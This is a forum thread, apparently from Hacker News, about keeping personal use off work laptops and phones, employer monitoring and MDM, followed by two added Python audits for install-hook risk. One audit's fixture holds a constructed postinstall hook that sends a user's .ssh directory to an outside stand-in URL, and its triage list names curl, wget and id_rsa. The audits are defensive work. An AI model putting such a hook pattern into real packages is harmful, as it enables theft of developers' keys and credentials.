IANAL, but as far as I read into the situation, employee monitoring is a very dangerous field. There are exceptions, however, such as company-provided http(s) proxies and more concrete monitoring or investigation when suspicion arises (I know of two cases where employees were suspected of consuming child porn and they were both monitored as well as having their hardware seized).
Lastly, the companies or specific malicious admins might simply not care about the legality and still monitor you - either for company reasons or simply to stir through your data. If they have admin access to your computer, it's simply not your computer.
Sure, but fortunately we’re not context-free text generators. We are able to see that we are in a thread where the guy was let go for poor performance. Like that shit is not “poor performance”.
That seems like a question for the legal department, not for the IT department.
You're doing this thing that smart people do (I know because I do it myself if I'm not careful) where you way overstep your area of expertise. It's not a good look, avoid the trap.
EDIT: You've changed your stance from a general stance to a specifically ethical stance here, and I agree: it would be better if employers respected the privacy of their employees more.
However, that's just not the world we live in. From the perspective of an employer, you can make your choice to behave ethically regardless of the legal implications, and that's a choice that I would laud you for. But from the perspective of an employee, you shouldn't assume that your employer will behave ethically: on the contrary, I would always assume that your employer is going to go through your computer when you give it back. You can fight that if you want, but that's not the hill I would choose to die on, as there are much worse privacy violations going on.
If you want to see how bad things have gotten, freeze your credit, sign up for credit monitoring, and then start applying for jobs, and see what happens. About 75% of jobs I've applied for in the last few years have tried to pull credit reports--and you can't really stop them as long as they do a "soft" credit check (freezing credit doesn't block this).
Because that is the smart thing to do. I got to purchase my laptop when I left the company, and they still wiped it out before handing it over. It protects them and it protects me. I do not want access to any company resource, it can only hurt me. And they are not interested anymore in what was in the laptop either.
> We were investigating the employee as part of their offboarding.
I do not know how it works in your country, but anything that you discover of his personal life becomes a liability for the company. If he had AIDS and now you get that knowledge and it leaks, you may find the company fined for big money. In Europe, again and again, companies are forbidden to use any knowledge gained spying on employees.
What reason would you have to investigate an employee that is leaving the company anyway? Unless it has some contractual impact and your company HR/legal department is aware, there is no reason. "To see what the employee was doing" is not a legal reason.
I strongly agree that IT needs ethical education. That you have access to some information does not mean that you have the right to access it or that it is moral to do so.
(I'm in the US and have worked a similar job as the parent poster and have had to do similar things on several occasions.)
>What reason would you have to investigate an employee that is leaving the company anyway? Unless it has some contractual impact and your company HR/legal department is aware, there is no reason. "To see what the employee was doing" is not a legal reason.
In our case, we would and could never investigate someone for any reason besides HR and/or legal explicitly requesting it for a specific reason and telling us what they wanted us to look for and why. "Fishing expeditions" weren't permitted. (There were a few occasions where such fishing expedition requests did come from them, and our managers would push back and basically professionally tell them to fuck off.)
I'm not sure of any specific laws or liabilities, but I'm sure we also would (and should) have likely been sued if we discovered some sensitive personal information about an employee and that information then leaked. If we inadvertently stumbled across personal things like that during the course of a specific investigation, we would always ignore it and not make any record of it. We didn't care about someone's personal life and didn't intentionally ever look at anything related to it.
Due to the nature of the investigations, it was often unavoidable that we'd end up seeing something at least somewhat personal, even if it's just some random website they habitually browsed appearing multiple times in their browsing history.
So, we would never look at an employee's computer or network traffic "just to see what they were doing" or just because we could. That would definitely be extremely unethical and unprofessional, and if management discovered any of us doing that we surely would and should have been fired. However, I'm not sure if there are actually any laws against that in the US if it's disclosed in the employment contract.
Okay, man, I’ll trust that you’re doing this because they were stealing stuff or something like that but if it’s just sucking at their job then damn, dude. That’s like kinda a shitty thing.
Sure it’s company hardware, and you get to do this shit but damn that shit would be like “I gotta get out of here” if I heard IT was scanning people’s browser history for sucking at their jobs.
EDIT: The lawsuit thing makes this even worse. If I even heard that someone was suing their employees for poor performance I am like straight up blackballing that company and all of its damn subsidiaries as places to work. Like my friends would know, my family would know, friends of my family would know. I’m sorry, this is straight up unacceptable to me.
It's important to document and archive the contents for liability reasons, but the takeaway here is that you should remember that the laptop belongs to the company and you have zero rights to privacy on it, so conduct yourself appropriately.
Depends where. Here in Europe it has been said that a Personal folder cannot be looked at by the company. But ofc it can ask you to delete it or fire you if you spend too much time idling but Personal data is Personal.
>It's important to document and archive the contents for liability reasons
Unless this guy was sexually harassing people, I'm curious how this is going to protect anyone from any kind of liability.
>you should remember that the laptop belongs to the company and you have zero rights to privacy on it, so conduct yourself appropriately.
Yes, but as others have mentioned, just because the company has the right to do that doesn't mean it's either ethical OR good. No one here was asserting the right to privacy on company owned hardware.
I pretty much assume they're watching everything I do on a work computer. I don't do anything that would be too embarrassing to see sitting printed out on my supervisor's desk.
Same here. It's my only Windows machine and the only one that reliably prints some PDFs. If they cared that I'm printing out MLP RPG sheets to play with my daughter I'll have that conversation.
I never have work email on any device but work's.
I used to work with a security guy who tried to make it a policy that staff would have to hand over their social media logins to make sure that they weren't talking to anyone or having any conversations that were "suspicious".
Fortunately that idea was beaten to a bloody pulp by the HR team before it got off the ground. But you would not believe the mall cop mentality in many companies.
Don't work for a company that wants to "manage" your computer for you. You are assuming liability regardless if you manage it or they manage it. What you end up getting is usually crappy hardware, a bunch of redundant software that is terribly managed and outdated, and being told how to do your job and what software you can use even though you're supposed to be the expert.
The same people installing SolarWinds and requiring you use Outlook with 10 different compromised extensions will be the first to try blaming their employees for installing Docker or kubectl because it wasn't approved software yet you were brought in to be the container expert.
Firefox is handy if you want to occasionally do personal stuff on a work-provided Windows PC, since it has its own proxy settings (where Chrome uses the Windows settings). Also DNS-over-HTTPS. So if you run a proxy on an outside host, it's all still reasonably separated.
I suppose you could wrap it with Windows sandbox[1] if you're paranoid.
Employee tracking isn't anything new or all that surprising. Do everything as if it is going to be made public at some point. EMPLOYERS ARE NOT YOUR FRIENDS.
If they buy you internet, they are tracking it. If they provide you with a computer, they are tracking every click and pointer movement.
Keep work computers and personal computers separate and that includes all methods of IO.
I used to work for a Fortune 10 company, and they retroactively changed their approach to personal data on company computers. Yes, does it sound illegal? Very much NOT so, but they totally got away with it.
....Except there was an accidental malformed script that wiped all the user folders and backup data. Ever wonder what happens to a SAN when every disk shits itself for a few days?
I'll never really know what the outcome of the malformed script was except there was no retroactive application of corporate rules because the thing the rules were meant to apply to simply didn't exist anymore.
Coincidentally, it was also the same day that I quit and decided to work for myself.
More than avoiding keeping the personal stuff on the work laptop, avoid keeping work stuff on personal hardware. When you're off work, you're off work. No email, no notifications, no nothing.
The only work thing I have on my personal phone is Slack, and that's with auto-DND outside work hours. If there's an emergency, you can call me.
Not that simple. My company has BYOD for phone, but my total compensation is crazy good, a lot better than any other opportunity near my location. Why should I run?
I got a phone so shitty that I gave it back. The phone was only going to sit at the bottom of my bag, where I would never hear it. I couldn't even log into Slack since I didn't want to log into Google Play with a personal Gmail account on it.
I don’t personally believe in the concept of employer-owned / managed devices; they’re a Trojan horse into my personal space. I buy my own tools, and use them for my livelihood subject to my own narrowly-defined security locus.
As far as I am concerned, I am your paid consultant, and I will grant to you far more valuable information (via source control or shared docs) over the course of our shared engagement than you will ever grant to me. When you are no longer able or willing to pay me, all of it will disappear in a plume of smoke, like crumbs on a dirty plate.
This is one side of it. Your side. Employers also have valid interests. You may not like that work situations tend to involve asymmetries and power imbalances. They may not be fair. You might not value their interests, but they tend to take steps to protect them.
Whatever you may think about the fairness of these, there are consequences to your actions. With regards to work, laws and policies don't adjust based on what you believe. (They are based on what you do or don't do.)
Nothing I’ve suggested implies a compromise of valid interests; any reasonable security posture assumes that an employee-held workstation is, managed or otherwise, an attack vector whose access must necessarily be quite limited.
As for asymmetries of power, that’s up to you to assess for yourself and your own well-being, as to what you’re willing to cede to someone else. Don’t be weak.
And, by the same token (no VPN pun intended), if your employment relationship is not based on some degree of trust, you’ve already lost.
I think I know what you mean. The key word to me is "assess", as in "be mindful" of the gap between your goals and reality, your options, and the likely consequences.
Since this kind of aphorism ("Don’t be weak.") can be interpreted in many ways, I like to elaborate. In this context I would say:
* Know your legal rights
* Be proactive, protect yourself, have back-up plans
* Understand the pros and cons of your options; e.g. standing up for yourself. The downsides may involve employer friction and perhaps legal cost and lost wages. The upsides may be deferred and quite uncertain.
* Pick your battles.
Beyond the individual dimension, raising awareness, organizing, and collective action go a long way towards promoting employee rights. These improve the "menu of options" available to individuals dealing with organizations that tend to benefit from a power imbalance.
The one I think is harder for a lot of people is the phone in BYOD environments.
When I started needing specific apps for work, I also got a work phone. I don't think my employer is doing anything creepy, and now I know if I'm wrong about that, it is contained and severed from my everyday phone.
Get a $30 bottom end prepaid Android phone at Walmart and such. If you're only using it for 9-5 work stuff and expect to be on wifi you don't even need to pay for a cheap SIM card or plan. Yeah it will suck and perform terribly, but who cares it's just for the odd slack/email/etc. notification and that's it.
Are you saying you personally purchased a phone for use as a work device? That's completely bonkers to me. I have a personal phone and a work phone, but I definitely don't pay for the work phone out of my own pocket. I even made them order the case and screen protector I put on it.
Regarding using your work laptop for personal stuff, there is a very important security aspect to it I've not seen many people be careful about.
When installing any software such as applications, or, as developers, dependencies for your programming language of choice, you're always at risk of installing something that once executed would for example grab your ssh keys and push them to a server somewhere, or all your environment variables, etc., etc.
So, if that happens when doing normal work, it sucks, it's bad, but you were doing your job the best you could.
What I think should be unacceptable is for this to happen when you're working on your own side projects or your personal stuff.
To avoid this, as everyone suggests, don't use your work laptop, but if you do (example: while traveling, or because your work laptop is more powerful, etc) just create a separate user account on it. Just this simple thing will provide a lot more security and protect your company from a lot of security issues.
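As an added example (not from the thread), a small audit in the spirit of this comment: before installing npm dependencies on a machine that also holds work credentials, list which packages declare install-time lifecycle scripts, since npm runs those automatically during `npm install`. The package names, the `collect.js` hook and the `example.invalid` URL are constructed sample data; `npm install --ignore-scripts` is the corresponding npm-side mitigation.

```python
"""Audit a node_modules tree for packages that run code at install time."""
import json
import tempfile
from pathlib import Path

# npm executes these package.json "scripts" entries automatically during
# `npm install`, so this is where install-time code execution hides.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Rough triage markers for a human to look at first. Constructed for this
# example; a real list would be longer and tuned to your environment.
REVIEW_TOKENS = ("curl", "wget", ".ssh", "id_rsa", "printenv", "base64",
                 "http://", "https://")


def find_install_hooks(root):
    """Map package name -> {hook: command} for every package.json under
    root that declares at least one install-time lifecycle script."""
    findings = {}
    for pkg_json in sorted(Path(root).rglob("package.json")):
        try:
            data = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, don't crash
        if not isinstance(data, dict):
            continue
        scripts = data.get("scripts") or {}
        hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
        if hooks:
            findings[data.get("name", pkg_json.parent.name)] = hooks
    return findings


def triage(findings):
    """Return (package, hook, command, markers) tuples for hooks whose
    command mentions something worth reading before you let it run."""
    flagged = []
    for name, hooks in findings.items():
        for hook, command in hooks.items():
            markers = [t for t in REVIEW_TOKENS if t in command]
            if markers:
                flagged.append((name, hook, command, markers))
    return flagged


def build_sample_tree(base):
    """Write a constructed node_modules with three fake packages:
    one with no scripts, one with a common native-build hook, and one
    with a postinstall hook that points at the user's .ssh directory
    and an external URL (constructed; collect.js does not exist)."""
    samples = {
        "plain-utils": {"name": "plain-utils", "version": "1.0.0"},
        "native-addon": {"name": "native-addon", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        "helpful-colors": {"name": "helpful-colors", "version": "0.0.3",
                           "scripts": {
                               "postinstall":
                                   "node collect.js $HOME/.ssh "
                                   "https://example.invalid/in",
                               "test": "jest"}},
    }
    root = Path(base) / "node_modules"
    for folder, manifest in samples.items():
        pkg_dir = root / folder
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest),
                                              encoding="utf-8")
    return root


def demo():
    """Build the constructed tree, audit it, and return (findings, flagged)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        findings = find_install_hooks(root)
        return findings, triage(findings)


if __name__ == "__main__":
    found, flagged = demo()
    print(f"{len(found)} package(s) run scripts at install time:")
    for name, hooks in found.items():
        for hook, command in hooks.items():
            print(f"  {name}: {hook} -> {command}")
    print(f"{len(flagged)} hook(s) need a look before installing:")
    for name, hook, command, markers in flagged:
        print(f"  {name} ({hook}) mentions {', '.join(markers)}")
```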
I moved my work life onto a Lenovo ThinkCentre connected to a 1440p display and a Rode USB mic. Video isn’t worth it when you have amazing audio. I live my life in a browser and a terminal emulator and the hardware is fully supported by my favourite free and open source OS.
The back looks like this, to give an idea of scale:
What a lovely little platform, especially for $100. That’s a price point that makes hardware replacement easy to stomach. It also freed up my MBP for personal stuff only.
Being a desktop it also means I have to “go to the office” to do work stuff. Bliss.
If you use the same computer for work and home, then you may be able to create a user account for your work stuff and a different user account for your home stuff.
If you do consulting for multiple customers, then you may be able to create a different user account per customers, so there's some separation among your customers' information.
If you're able to use thin clients, then you may be able to create separate user accounts on the servers, so any files stay fully on the servers and never download to your local computer.
When you use multiple user accounts, you're having the operating system help separate things per account, such as each account's credentials, profiles, logins, histories, cookies, caches, etc.
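The two posts above (the separate-account advice for side projects, and the per-account separation list) rest on the same mechanism: a dependency's post-install hook runs with the privileges of whoever invoked the install, so it can read whatever that user can read. The following Python audit is an added example, not code from the thread. It models the threat named above by listing what such a hook could harvest from a given home directory and environment (private SSH keys, common credential files, secret-looking variables), and it checks the one property the separate-account advice depends on: that the work account's home directory is not readable by other local accounts. The file list, fixture directories, file contents and variable names are all constructed for the example.

```python
"""Blast-radius audit: what an install hook running as *you* could exfiltrate.

Added example, not code from the thread. Directories, file contents and
environment variables below are constructed fixtures, not real secrets.
"""
import os
import re
import stat
import tempfile
from pathlib import Path

# Credential files a harvesting script commonly looks for, relative to $HOME.
# Assumption: the usual default locations; extend for your own tooling.
CREDENTIAL_FILES = [
    ".aws/credentials",
    ".npmrc",
    ".pypirc",
    ".git-credentials",
    ".netrc",
    ".docker/config.json",
    ".kube/config",
]
ENV_SECRET_RE = re.compile(r"(TOKEN|SECRET|PASSWORD|API_KEY|AWS_ACCESS|AWS_SECRET)", re.I)


def audit_home(home, environ):
    """Return the files and environment variables a hook with this home/env could read."""
    home = Path(home)
    findings = {"files": [], "env": []}

    # Private SSH keys: anything under ~/.ssh whose first line is a private-key header.
    ssh_dir = home / ".ssh"
    if ssh_dir.is_dir():
        for p in sorted(ssh_dir.iterdir()):
            if p.is_file() and not p.name.endswith(".pub"):
                try:
                    first = p.read_text(errors="ignore").splitlines()[:1]
                except OSError:
                    continue
                if first and "PRIVATE KEY" in first[0]:
                    findings["files"].append(str(p.relative_to(home)))

    for rel in CREDENTIAL_FILES:
        if (home / rel).is_file():
            findings["files"].append(rel)

    # Environment variables are the other common target; names are enough to show exposure.
    findings["env"] = sorted(k for k in environ if ENV_SECRET_RE.search(k))
    return findings


def home_readable_by_others(home):
    """True if accounts other than the owner can list or traverse the home directory.

    A second OS account only contains the damage when this is False; many
    distributions historically created home directories with mode 755.
    """
    mode = Path(home).stat().st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH))


def build_constructed_work_home(mode=0o700):
    """Throwaway directory laid out like a developer's work account (constructed fixture)."""
    home = Path(tempfile.mkdtemp(prefix="work-home-"))
    (home / ".ssh").mkdir(mode=0o700)
    (home / ".ssh" / "id_ed25519").write_text(
        "-----BEGIN OPENSSH PRIVATE KEY-----\n"
        "constructed placeholder, not a real key\n"
        "-----END OPENSSH PRIVATE KEY-----\n"
    )
    (home / ".ssh" / "id_ed25519.pub").write_text("ssh-ed25519 AAAA constructed\n")
    (home / ".aws").mkdir(mode=0o700)
    (home / ".aws" / "credentials").write_text("[default]\naws_access_key_id = CONSTRUCTED\n")
    (home / ".npmrc").write_text("//registry.npmjs.org/:_authToken=constructed-token\n")
    os.chmod(home, mode)
    return home


def build_constructed_side_project_home():
    """A fresh account for side projects: nothing work-related for a hook to harvest."""
    home = Path(tempfile.mkdtemp(prefix="side-home-"))
    os.chmod(home, 0o700)
    return home


# Constructed environment of the work account; only the names matter here.
CONSTRUCTED_WORK_ENV = {
    "HOME": "/home/work",
    "PATH": "/usr/bin",
    "EDITOR": "vim",
    "GITHUB_TOKEN": "constructed",
    "AWS_SECRET_ACCESS_KEY": "constructed",
}

if __name__ == "__main__":
    work = build_constructed_work_home()
    print("work account exposes:", audit_home(work, CONSTRUCTED_WORK_ENV))
    print("work home readable by other local users:", home_readable_by_others(work))
    side = build_constructed_side_project_home()
    print("side-project account exposes:", audit_home(side, {"HOME": str(side), "PATH": "/usr/bin"}))
```

Run it as is to see the two audits side by side; point `audit_home` at your real home and `os.environ` to see your own exposure. The separate account helps for two reasons the output makes visible: the side-project session's environment carries none of the work secrets, and the work account's files are out of reach only while its home directory mode excludes group and other, so check `home_readable_by_others` on the real directory rather than assuming the distribution's default is 700.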
OK. So my work laptop and phone only get access to the guest VLAN at home, where hosts are completely isolated from the default VLAN where my family's personal stuff lives. Now that I'm no longer on any on-call list the laptop gets powered down and the phone goes into a drawer by 18:00 every night. That's privacy and genuine work-life balance. Back in my younger days I saw too many colleagues lose everything because they couldn't resist "co-mingling" personal and business assets. It's _always_ a bad idea. As others here have pointed out, company asset risk systems have become increasingly draconian -- for good reasons.
What do you mean "lose everything"? Do you mean they got fired for misusing work computers? Or do you mean they lost their data because the work computer was wiped?
Maybe it's sending personal texts or emails from your work phone, editing personal documents or photos on your work laptop, or joining a virtual happy hour with friends from your work tablet.
So... I agree with much of this article. However, the above is silly and undermines the point. Basically living with these devices should not be a concern any more than faxing personal health expense forms using the company fax machine. Or using the cheap pen from the office supply room anywhere.
Should you do projects with company resources? No. But that is not exactly a slippery slope. Don't pretend it is one.
On one hand, if a person is mindful and aware of their actions, they are likely to make thoughtful decisions about what is appropriate.
On the other hand, some habits form slowly. Sometimes bad habits creep in when you are in a hurry or lazy.
It depends on many factors. Many people find value in setting rules that seem too strict for others. Know yourself and choose accordingly and/or adapt to your workplace as necessary.
This is the slippery slope argument. My assertion is that we shouldn't, as a society, accept that some things are wrong. Such that that is the wrong argument to use here.
At large, I also think that this means some things can't be codified. Such that some activities are highly dependent on expected duties of the employee.
As an example, as a security guard, if on the job you think up a good movie script and get it written, I don't see any argument that you thought of it while at work compelling. Even if you jotted notes throughout the day. If you are a staff writer for a studio, I'm sure the case is different.
So the same here. It is not a slippery slope. Nor is it a uniform field. And, in general, I suspect I would side with individuals over corporations way more. Probably not exclusively, but predominantly.
Edit: not that I think your advice is bad, really.
> At large, I also think that this means some things can't be codified. Such that some activities are highly dependent on expected duties of the employee.
I'm pretty sure you mean "some things shouldn't be codified". I'm not trying simply to nitpick; I think using the word "should" signals very clearly that you are making a value judgment, not a judgment of what is possible.
Here's how I'm interpreting your words: "There are many employee behaviors that employers want to promote that are too nuanced or complex to codify". I have a lot of concerns with such a statement:
1. I've seen a lot of people make such a statement because they are unwilling and/or unable to design policies. Some people want perfection, and the messiness and complexity of the real world bothers them. Instead of embracing and managing this uncertainty, they retreat to the false dichotomy of "if we can't do it perfectly, we shouldn't try it at all".
2. I find the statement implies the wrong goal. The goal isn't perfection; rather, the goal is to make policies that *improve* relative to *the next best alternative*.
To design policies and assess performance toward such goals, I like to use a combination of systems thinking, probabilistic reasoning, and realistic models of human behavior.
This also depends on your role. If you have a leadership role, you will likely see that not designing and advocating for policies is an abdication of your responsibilities. In short, no matter how imperfect, you have to make a decision. To quote a movie title, you can't be neutral on a moving train.
Ah, completely agreed on my word choice being wrong there.
Agreed on doing things to try to move the needle in a better direction. I will disagree the minute things land in a "zero tolerance" bucket. Yes, there are easy straw men that can and should be burned down. Nuance and discretion abound, though.
So, I probably do not disagree with the method for making policies you are describing. I'm also probably more comfortable with the idea that many policies are ultimately to be questioned, as well.
> My assertion is that we shouldn't, as a society, accept that some things are wrong. Such that that is the wrong argument to use here.
I'm not sure I'm following how your comments got here. Do you intend to make the above broad assertion ("we shouldn't, as a society, accept that some things are wrong")? To put it another way, are you arguing in favor of moral relativism?
Sorry. I'm fine accepting that some things are wrong. I specifically meant the examples in question here. So, I did not mean that we shouldn't accept that any things are wrong. I do think we should be very picky on the things we accept as wrong, in and of themselves.
> I do think we should be very picky on the things we accept as wrong, in and of themselves.
An interesting point. Many of these assessments are arguably subconscious and/or inculcated.
Some philosophies aspire to as few fundamental guiding principles as possible. Such a structure tends to improve self-consistency.
Other philosophies allow a broader mix of principles, sometimes in tension, which require considerable subjective discussion to untangle. Perhaps one could say these philosophies value human discussion as a core principle from which meaning is constructed.
I am not up to date on philosophies. What little I have learned over the years has waned in my mind such that I don't trust I have it right.
That said, "these philosophies value human discussion as a core principle" really resonates with me. I don't like policies that are designed to be enforced without the people involved interacting with each other in some form. Again, yes there are some straw men that we should burn down when they appear, but I have a hard time with policies pushed in a "zero tolerance" fashion.
The biggest barrier to this for people outside the US and Canada is phones. People need "real phone" functionality (voice+txt+mms) on one device, and Google Voice and Twilio don't do that for a sizeable percentage of the global population outside of the US and Canada, so people either use one phone for everything or they have 2 phones. The BYOD and MDM around that is a security nightmare.
That's why I created BenkoPhone (currently Australia only :)
I now have three laptops, two iPads and two iPhones on my desk all day though. Which is a complete fucking pain. Some days I wish I did something else for a living.
Two years ago I was working for a corporation that asked us to install Teams on our phones (so they could bother us even on the weekend). In order to install Teams you have to install a Microsoft app that lets the account holder be the owner of the device (as the disclaimer of the app says). When I asked about this, HR told me that this is for the case my phone got stolen, so they could erase it remotely. Not a day goes by without me thanking God I left that place.
It's actually pretty standard practice, and it makes sense. If your phone gets stolen, and it has sensitive company data on it, then they need to ensure their data is wiped.
In the case of the Microsoft Company Portal app, and enrollment in Intune, a separate work enclave is created, at least today. The enclave is fully controlled by your company's Intune policies, but your personal enclave remains untouched. It's how MDM should be.
I don't think it makes sense at all. If they want to own my phone, they should give me one and not take the one that belongs to me and have all my personal stuff.
If I use my work laptop at home, I even put it in a separate guest WiFi. Since the introduction of an Endpoint Management system it essentially became an untrusted device.
These days I do almost all of my work on my personal desktop since it's so much faster and more pleasant than my work issued laptop. Funny enough, the main time I use the work laptop is to play Netflix while doing the dishes or folding laundry. So I'm sure it looks like I'm not doing anything at all. Laptops off for 3 days, I turn it on and go straight to Netflix. Oh well.
When we all had to work from home due to Covid, we were also encouraged to install MS Teams on our phones. But for that to work, we needed to install some other security crap on our phones. Initially just in the work profile, but eventually they decided they also needed to control my private profile.
I kicked everything off my phone. They can buy me a phone if they want to control it.
This is one of the reasons I'm starting to like thin client stuff for work. They've gotten pretty good even for large-screen GUI desktops, and if your "work laptop" is actually a different machine that's just open inside one app on your personal one, it is very easy to keep your personal stuff outside of that session.
I knew a guy who auto-forwarded personal mail to his work mail. Then once he went on leave he set up an auto-forward from his work email to his personal email. Problem was he forgot to turn off his private email forwarding and created a fine infinite loop of forwards that effectively crashed the email server.
Never again will I use a work PC containing personal files. When I was fired a few years ago, the employer seized the work laptop without giving me a chance to wipe out my personal stuff. It contained my personal notes and sensitive info which I'd not want to share with anyone. Since then, if I need to have my personal notes on my work PC, I always keep them in an encrypted VeraCrypt drive.
I know it's easier to have 2 laptops (one for work, one for personal stuff), but I can't ignore the convenience factor. For example, I have text notes on tech/programming that I have made since college, and I refer to them often while at work. It's easy to copy/paste on a single laptop. Recently, I've been using Synergy so I can run 2 separate PCs, so it does help a bit.
1. It starts with an anecdote about a CIA director in the mid 90s. Umm, yeah, if you have access to top secret info, I would be very careful about mixing work and personal content.
2. It talks about how much of a pain it can be if you have to wipe your personal data off your laptop when you return it. I may be somewhat unusual for the HN crowd but not for the population at large but virtually all the data I care about lives on a few cloud services, and backing up a few trivial files (like my updated zsh config) is easy.
I just always have one personal Chrome window for any personal stuff, and a separate Chrome window with my work account. Totally easy to keep things separated that way.
> Umm, yeah, if you have access to top secret info, I would be very careful about mixing work and personal content.
Don't think you don't have that. Do you work with any personal or internal company data? Do you have access to systems that contain them? I.e. databases, backup servers, internal portals with company-only announcements ...
Sure, you probably don't work with data classified as top secret, but being implicated in the release of personal data or internal data, especially if it helps the competition or influences the stock price, will get you very quickly in really hot water.
> I may be somewhat unusual for the HN crowd but not for the population at large but virtually all the data I care about lives on a few cloud services
... as well as your local files (Dropbox & Co.), your browser cache and your OS cache. Maybe your password store. Just because the data is not mainly stored on your device does not mean that nobody will access it. Also, people do run data recoveries on these, especially when you did not have time to prepare for this ("This laptop is under investigation, we take it right now, please report to HR").
I use a personal AWS Workspace as my personal machine, that I can access from my work laptop. It's handy, although I wish the cost was lower. Does anyone have a better managed VDI suggestion?
I bought a used R710 server for $200 and put it in the basement. I can run a handful of Win10 or Linux VMs on it at the same time and remote desktop into each of them. Just used wired ethernet if you can for speed and keeping the wifi quiet.
Fair point. The server draws 185W @ idle and at my power cost it's about $15/month to run. Amortize the server hardware too and it's maybe $25/month
The server has 24 cores, 32GB/1TB, and I can't see what an equivalent AWS instance would cost monthly. But it's easily more than $25. The PowerPro (8vCPU 32/175) is $148 monthly.
What about iPhones? I was under the impression even with a company managed MDM profile installed, there’s a limit to how much they can see, like they can’t see messages or browsing history
It depends on the MDM. My work's MDM required full access to my phone. That is, the MDM software was fully capable of wiping the full device (not just the MDM data store). IT promised they wouldn't/couldn't do that; yet the app required the permissions. So yeah, noped right out of that.
For what it's worth: the company (HR in particular) logs everything you do, so that in the unlikely case they need to justify firing you, they have ammunition. Even if it's unrelated to the real reason.
This is especially true of companies with sensitive contracts, data, or relationships where they have all kinds of reasons to want to cover their butts. They may intentionally ignore you doing something you shouldn't, just to silently build a case and keep it in a back pocket.
I have always wondered about this... here in the third world, students pretty much rely on Windows Education and Office 365 Education for all their Windows / Office needs, as the cost for these is too high. Yet, you don't actually "own" these as a student; they're managed by your IT department. So I was always curious if there are any implications / hidden traps.
I really do wish iOS had appropriate os-sanctioned containment for work apps. Like, I’m talking a switch I throw and springboard flips over and shows me another whole set of apps with different data. Similarly, I should be able to assign a SIM to each profile. That way, whatever required MDM is isolated to that profile and doesn’t touch personal stuff, guaranteed.
You can emulate the concept of flipping over / changing which apps are on the homescreen / notifications with the upcoming iOS 15 “focus” profile concept.
I'm experimenting with using AWS Workspaces. Given that I can do so much of my work using other AWS tools (and other cloud services) I don't need much power. I haven't tried this yet, but it appears that I could make a bundle for a base system, setup a client from a base and then create a new bundle for work with that client?
The company I work for is about 50 people. About 80% of the employees have a company issued laptop that they have free rein over and the other 20% opt to use/bring their own laptop. I'm in the latter camp, because I do blur my personal and work life, and there's no way they can seize my laptop should anything undue happen.
Sharing a device is one thing; something I also see frequently is people using their work email address to register for various personal services. Login using 2FA SMS to your work phone number, of course.
This can give you a really hard time resetting services if you change work and can't carry the phone number with you.
*Sidenote: I see many non-tech users (family members?) doing this, they use their ISP provided email for everything! This goes well until you get shitty service and want to move ISPs or they go out of business. Looking at everyone in South Africa that is stuck with telkom or mweb mailboxes! :D
I would love to do that, but my very old home PC died, after I started using it a lot more often while staying at home.
The replacement is on backorder now for 2 months and no firm shipping date has been given yet. There is a chip shortage, a global logistics backlog, etc.
I tend to try and keep a good separation between the two, but every time I need to return it at the end of my employment, I make sure the user account and all relevant data is erased. Always feels a bit satisfying to return a bare computer to the company.
That and the fact that I wanted to simplify my life led me to use my work laptop and phone for personal stuff. I feel great after I ditched my Linux Thinkpad that constantly required maintenance and personal time. Carrying 2 phones was getting on my nerves as well.
Of course, my employer is not strict about this and doesn’t care much. I realize other employers might see this otherwise.
I thought I'd be safe and boot into an OS on an external SSD for non work related activities on my work hardware, but somehow it now boots to grub by default even without the SSD plugged in. :(
What do you all do to manage this? For example, do you take 2 laptops when you travel? What other habits make this practical?
Here's what I do, as a compromise. I know it exposes personal data.
* Any personal projects are managed in the cloud on an EC2 instance. Personal development is remote via SSH. Only local artifacts are ssh keys
* I have a separate chrome profile for personal. All personal activity is in that profile.
* With few exceptions, I avoid storing personal files on the device itself. Personal files go into the cloud / google drive.
I know that my cookies and browser history are being recorded, but I haven't yet found a reasonable way to avoid personal access on my work device.
Also just for practical reasons. When I shift to a new work laptop or reformat my current one for whatever reason I don't want to sift through docs and pictures I might lose.
My friend uses one computer for both personal and business but he owns the company. I’ve always wondered if that was prudent, perhaps separate accounts at least?
Separate computers? Sure. Separate phones? No. I have outlook installed in a little sandbox app (nine), and slack. My slack notifications are blocked. I don't want to have to charge and carry two separate phones every where I go.
I also refuse to install any software on my phone that I'm not comfortable with. For example, outlook wanted permissions to remote wipe my phone and a lot of other skeevy stuff. That's not going to happen. I've heard of some employers asking to install tracking applications on their employees phone, that wouldn't fly either.
I think one of the biggest risks to the employee is the CEO or anybody in power simply deciding to let you go and suddenly taking your machine from you without notice while you're in the office.
Or ransomware invading your work laptop and encrypting your stuff.
Or your creepy IT guy figuring out the stuff you post on amazon or having access to your nudes or whatever.
I made this mistake during my first internship and pretty much never did it again. I'm so glad because I would have performed even more poorly during WFH if I had.